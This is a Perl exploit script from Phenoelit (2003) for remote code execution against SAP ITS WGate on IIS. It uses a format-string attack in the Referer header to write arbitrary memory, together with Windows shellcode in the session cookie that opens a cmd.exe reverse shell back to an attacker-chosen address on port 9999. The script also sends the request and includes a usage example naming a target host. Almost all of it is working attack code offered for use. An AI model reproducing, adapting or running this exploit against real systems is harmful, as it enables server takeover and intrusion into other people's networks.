#!/usr/bin/perl -w use IO::Socket; $|=1; $cont= "Phenoelit SAP ITS WGate ISAPI exploit\n". "FX of Phenoelit , 2003\n\n"; print " * * * SAP ITS WGate 4.6/6.1 remote * * *\n". " --==]] Phenoelit - http://www.phenoelit.de/whatSAP/ [[==--\n". " by FX - 2003\n\n"; $U_host=shift; $U_host_addr=shift; $U_host_port=shift; $U_self_addr=shift; # connect back addr $U_self_name=shift; # Remote-Host/Remote-Addr value $U_https=shift; $U_https="OFF" if (!defined($U_https)); if (!defined($U_self_name)) { &usage; exit 1; } $U_self_addr=~/([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)/; $conback=sprintf("%c%c%c%c",$1,$2,$3,$4); printf("Connecting back to %d.%d.%d.%d:9999\n",$1,$2,$3,$4); $shellcode = ""; #"K"x1500; $shellcode .= "el1t"; $shellcode .= "\xeb"."%25"."\x27\x0f"; $shellcode .= $conback; $shellcode .= "\x02\x06\x6c\x59\x6c\x59\xf8\x1d". "\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f\x33\x32". "\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed\x2c". "\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x78\x08". "\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x4b\x1c\x01". "\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20\x01\xfb\x31\xc9". "\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31\xc2\xd1\xe2\x84\xc0". "\x75\xf7\x0f\xb6\x45\x09\x8d\x44\x45\x08\x66\x39\x10\x75\xe1\x66". "\x31\x10\x5a\x58\x5e\x56\x50\x52"."%2B"."\x4e\x10\x41\x0f\xb7\x0c\x4a". "\x8b\x04\x88\x01\xf8\x0f\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09". "\x75\xbe\xfe\x4d\x08\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0". "\x89\xc7\x6a\x02\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce". "\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66". "\x89\x30\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8". "\x55\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65". "\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53". "\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1". "\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a". "\xff\xff\x55\xe4"; ############################################################# ## ## We need to calculate the number of characters written when ## the first %n is encountered. ## ############################################################# $BSTR = sprintf( "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: %u\r\n". "Remote-Addr: %s\r\n". # client "Remote-Host: %s\r\n". # client "Server-Port: %s\r\n". "Https: %s\r\n". "Cookie: ~session=%s\r\n". "Host: %s\r\n". "Referer: http://localhost/", length($cont), $U_self_name, $U_self_name, $U_host_port, $U_https, $shellcode, $U_host); print "PRE = ",length($BSTR),"\n"; $htv = "\%10.0f" x 710; # 10 chars per %f $initial = length($BSTR) + (10*710) + 11; # What the IIS produces until %n print "INI = ",$initial,"\n"; $add = 3; # What do we need to add ? MIN=3! $add = 0x141-($initial&0xFF); # We want 0x41 there, so calc it print "ADD = ",$add,"\n"; ### Arbitrary memory write using format string $htv .= sprintf("_%%%uu_",$add); $htv .= "__\%08X_"; $htv .= "__\%n"; $htv .= "\%178u\%n"; $htv .= "\%10u\%n"; $htv .= "\%130u\%n"; # # First stage shellcode as format string, starting from string # counter value 0x??????7F # $htv .= "%361u%n%24u%n%256u%n%256u%n%256u%n%351u%n%240u%n%256u%n%256u%n%256u%n%256u%n%376u%n%64u%n%443u%n%66u%n%252u%n%256u%n%393u%n%348u%n%156u%n%252u%n%131u%n%357u%n%263u%n%197u%n%323u%n%256u%n%143u%n%330u%n%414u%n%265u%n%81u%n%256u%n%256u%n%256u%n%442u%n%230u%n"; $codeaddr = "\x01\xF0\xFD\x7F". "\x41\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x42\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x43\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x44\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x45\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x46\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x47\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x48\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x49\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x4A\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x4B\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x4C\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x4D\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x4E\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x4F\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x50\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x51\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x52\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x53\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x54\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x55\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x56\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x57\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x58\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x59\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x5A\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x5B\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x5C\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x5D\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x5E\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x5F\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x60\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x61\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x62\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x63\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x64\xF3\xFD\x7F". "\x01\xF0\xFD\x7F". "\x65\xF3\xFD\x7F". ""; $service="AAA". "\x24\xF0\xFD\x7F". # Write address "\x01\xF0\xFD\x7F". # dummy "\x25\xF0\xFD\x7F". # Write address "\x01\xF0\xFD\x7F". # dummy "\x26\xF0\xFD\x7F". # Write address "\x01\xF0\xFD\x7F". # dummy "\x27\xF0\xFD\x7F". # Write address $codeaddr. ""; $URI="/scripts/wgate/".$service; $request = "POST ".$URI." HTTP/1.0\r\n". "Host: ".$U_host."\r\n". "Referer: http://localhost/".$htv."\r\n". "Cookie: ~session=".$shellcode."\r\n". "Content-type: application/x-www-form-urlencoded\r\n". "Content-length: ".length($cont)."\r\n\r\n". $cont; &send_HTTP($U_host_addr,$U_host_port); exit 0; # # SUB # sub send_HTTP { my $remote; my $rline; my $dest; my $port; ($dest,$port) = @_; $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$dest,PeerPort=>"$port",); unless ($remote) { die "cannot connect to http daemon on $dest" } $remote->autoflush(1); print $remote $request; while ( $rline=<$remote> ) { print $rline; } close $remote; } sub usage { print "$0 [{OFF|ON}]\n\n". "Example: \n". "$0 webshop.company.com 1.2.3.4 80 10.1.1.2 10.7.2.3\n". ""; }